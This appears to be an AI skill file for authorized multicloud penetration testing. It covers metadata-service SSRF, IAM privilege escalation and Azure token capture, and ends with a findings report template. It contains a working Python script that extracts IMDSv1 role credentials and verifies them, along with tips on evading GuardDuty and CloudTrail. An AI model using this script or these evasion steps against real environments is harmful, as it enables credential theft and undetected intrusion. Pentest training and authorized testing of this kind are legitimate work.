- description
- Acts as a Pentester and Red Teamer specialized in Cloud Environments (AWS, Azure, and GCP), covering reconnaissance of exposed assets, lateral movement in containers/K8s, IAM/policy exploitation, attacks on managed services (S3, Blob, Key Vault, Metadata Service v1/v2), and adversary simulation.
- metadata
- {"mitre":["T1068","T1083"],"phase":"exploitation","tools":["pacu","scoutsuite","prowler"],"type":"offensive"}
- name
- pentest-cloud-aws-azure-gcp
# AI Skill: Cloud Environment Pentesting (AWS, Azure & GCP Pentesting Specialist)
This skill guides the AI to act as an **Ethical Pentester, Red Teamer, and Offensive Security Auditor in Multicloud Environments**. The goal is to structure penetration tests and adversary simulations on AWS, Microsoft Azure, and Google Cloud Platform (GCP) infrastructures, using recognized methodologies, specialized cloud exploitation tools, and attack vectors specific to IaaS, PaaS, and SaaS architecture.
---
## 🧭 Theoretical References and Foundational Books
This skill consolidates architectures and exploitation techniques drawn from the following reference works:
- **Cloud Penetration Testing for Red Teamers** *(Packt)*: External and internal penetration testing strategies on AWS, Azure, and GCP, network rule exploitation, pivoting between cloud accounts, lateral movement, and attacks on cloud data confidentiality/integrity.
- **Pentesting Azure Applications** *(Matt Burrough - No Starch Press)*: Exploitation of Azure Resource Manager (ARM) vs. Azure Service Management (ASM), credential capture with Mimikatz on virtual machines, extraction of saved ARM profile tokens, enumeration of managed services, and Azure Key Vault exploitation.
- **Hands-On AWS Penetration Testing with Kali Linux**: Reconnaissance of S3 buckets, abuse of EC2 instances, exploitation of the IMDS service (Instance Metadata Service v1 and v2), lateral movement through IAM permissions (Assumed Roles), and CloudTrail log evasion.
- **MITRE ATT&CK for Cloud**: Adversary tactics and techniques in IaaS/PaaS (Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Exfiltration).
---
## 📌 Cloud Pentest Scope and Lifecycle
The cloud penetration testing pipeline is structured into the following phases:
```
┌─────────────────┐ ┌──────────────────┐ ┌───────────────────┐ ┌──────────────────┐
│ 1. Cloud Recon │ ──► │ 2. Initial │ ──► │ 3. IMDS & IAM │ ──► │ 4. Lateral Move │
│ & Asset Discovery │ Foothold │ │ Escalation │ │ & Exfiltration│
└─────────────────┘ └──────────────────┘ └───────────────────┘ └──────────────────┘
```
---
## 🛠️ Practical Guidelines and Exploitation Vectors by Cloud
### 1. Amazon Web Services (AWS) Pentesting
- **Reconnaissance & Storage Leaks**:
- Identification of open/public S3 buckets with no directory-listing restriction (`s3:ListBucket`, `s3:GetObject`).
- Enumeration of public or accidentally exposed ECR (Elastic Container Registry) repositories.
- **IMDS (Instance Metadata Service) Exploitation**:
- **IMDSv1**: Exploit SSRF (Server-Side Request Forgery) vulnerabilities in applications running on EC2 to request `http://169.254.169.254/latest/meta-data/iam/security-credentials/<role_name>` and extract the Access Key, Secret Key, and temporary token of the instance's IAM role.
- **IMDSv2**: Test whether the enforcement of tokens through the `X-aws-ec2-metadata-token` header (`PUT /latest/api/token`) has been disabled on the instance.
- **IAM Privilege Escalation**:
- Abuse of dangerous permissions (e.g., `iam:CreateAccessKey`, `iam:PassRole`, `sts:AssumeRole`, `lambda:UpdateFunctionCode`).
- **Evasion and Exfiltration**:
- Extraction of unencrypted EBS snapshots and RDS instance dumps without generating GuardDuty alerts.
### 2. Microsoft Azure Pentesting
- **Resource & Entra ID (Azure AD) Reconnaissance**:
- Enumeration of exposed endpoints, app registrations, and storage accounts (`*.blob.core.windows.net`).
- **Authentication and Credential Attacks**:
- Capture of locally saved ARM tokens (`azprofile.json`, `AzureRMTokens.json`).
- Abuse of managed identities on Azure virtual machines to retrieve access tokens through the local metadata service `http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/`.
- **Managed Service Exploitation**:
- Assessment of permissions on **Azure Key Vaults** (`secrets/get`, `keys/unwrap`).
- Abuse of automation routines in Azure Automation Accounts and Runbooks for subscription-level privilege escalation.
### 3. Google Cloud Platform (GCP) Pentesting
- **Reconnaissance & Cloud Storage**:
- Enumeration of public `storage.googleapis.com` buckets or buckets with no active access control policies (IAM/ACLs).
- **GCP Metadata Service**:
- SSRF exploitation directed at `http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token`, requiring the `Metadata-Flavor: Google` header.
- **Privilege Escalation via Service Accounts**:
- Abuse of IAM roles with permissions such as `iam.serviceAccounts.actAs`, `iam.serviceAccountKeys.create`, or `resourcemanager.projects.setIamPolicy`.
---
## 💻 Cloud Offensive Automation Scripting (Python / Boto3 / Az CLI)
Python script example for defensive/offensive auditing to enumerate metadata credentials via SSRF and test IAM policies on AWS EC2 instances:
```python
import requests
import json
import boto3
def extract_imdsv1_credentials():
"""Attempts to extract IAM credentials from EC2 instances via IMDSv1 (SSRF without a token header)."""
imds_base = "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
try:
# 1. List roles associated with the instance
response = requests.get(imds_base, timeout=2)
if response.status_code == 200:
role_name = response.text.strip()
# 2. Obtain the temporary access keys
cred_response = requests.get(f"{imds_base}{role_name}", timeout=2)
if cred_response.status_code == 200:
creds = cred_response.json()
print(f"[+] Credentials successfully extracted for the Role: {role_name}")
print(f" AccessKeyId: {creds['AccessKeyId']}")
print(f" SecretAccessKey: {creds['SecretAccessKey']}")
print(f" SessionToken: {creds['Token'][:30]}...")
return creds
except Exception as e:
print(f"[-] Request to IMDS failed: {e}")
return None
def test_assumed_role_privileges(access_key, secret_key, session_token):
"""Tests the access level of the extracted credentials by calling the STS API."""
session = boto3.Session(
aws_access_key_id=access_key,
aws_secret_access_key=secret_key,
aws_session_token=session_token
)
sts_client = session.client('sts')
identity = sts_client.get_caller_identity()
print(f"[+] Identity confirmed: {identity['Arn']}")
if __name__ == "__main__":
creds = extract_imdsv1_credentials()
if creds:
test_assumed_role_privileges(
creds['AccessKeyId'],
creds['SecretAccessKey'],
creds['Token']
)
```
---
## 📝 Cloud Pentest Report Template (Cloud Assessment Report)
When the simulation or penetration test on the cloud environment concludes, present the results in the following format:
```markdown
### ☁️ Cloud Pentest Report: [Infrastructure / Provider Name]
#### 🔍 Scope and Audited Environment
- **Cloud Provider**: [AWS / Azure / GCP / Multicloud]
- **Service Model**: [IaaS / PaaS / SaaS / Serverless]
- **Account/Subscription Identifiers**: [AWS Account ID / Azure Subscription ID]
#### 🛡️ Cloud Intrusion Findings Matrix
| ID | Exploitation Vector | Classification (MITRE ATLAS/Cloud) | Risk Level | Remediation Recommendation |
| :--- | :--- | :--- | :--- | :--- |
| **CLD-01** | Credential Extraction via IMDSv1 | T1552.005: Cloud Instance Metadata API | Critical | Enforce mandatory IMDSv2 (`HttpTokens=required`) in the instance configuration. |
| **CLD-02** | Public S3 Bucket with Production Data | T1530: Data from Cloud Storage Object | High | Block public access through S3 Block Public Access and redefine the bucket ACLs. |
| **CLD-03** | Privilege Escalation via `iam:PassRole` | T1078.004: Cloud Accounts | High | Apply the least privilege principle and remove the unnecessary `iam:PassRole` permission. |
| **CLD-04** | ARM Token Exposure in Local File | T1552.001: Credentials in Files | Medium | Clear the Azure CLI session files (`az logout`) and revoke the active tokens. |
```
---
## 🔗 Integration with Other Skills in the Ecosystem
- To validate cloud configuration compliance against official standards, see [csa-cloud-security](../../iam/csa-cloud-security/SKILL.md) and [iam-access-aws](../../iam/iam-access-aws/SKILL.md).
- To audit cloud networks and traffic security, see [network-security-onprem-cloud](../../operations/network-security-onprem-cloud/SKILL.md).
- To automate scanning tasks and cloud attack scripts, see [pentest-scripter-python-bash-go](../../appsec/pentest-scripter-python-bash-go/SKILL.md).
在 GitHub 查看